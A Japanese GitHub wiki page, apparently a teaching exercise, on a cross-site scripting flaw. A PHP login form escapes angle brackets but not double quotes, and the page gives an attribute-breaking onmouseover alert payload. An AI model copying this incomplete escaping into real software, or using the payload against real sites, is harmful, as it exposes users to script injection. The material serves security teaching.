クロスサイトスクリプティング 04 - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 4

"がエスケープされていないXSS

脆弱なソースコード (PHP)

<?php
$user=preg_replace('/</','&lt;',filter_input(INPUT_GET, 'user'));
$user=preg_replace('/>/','&gt;',$user);
$pass=preg_replace('/</','&lt;',filter_input(INPUT_GET, 'pass'));
$pass=preg_replace('/>/','&gt;',$pass);
?>
<form method="get" action="">login<br>
username<input name="user" type="text" value="<?php echo $user; ?>"><br>
password<input name="pass" type="password" value="<?php echo $pass; ?>"><br>
<input type="submit" value="login">
</form>

攻撃方法

?user="onmouseover=alert(1)//

クロスサイトスクリプティング 04 - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 4

脆弱なソースコード (PHP)

攻撃方法

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️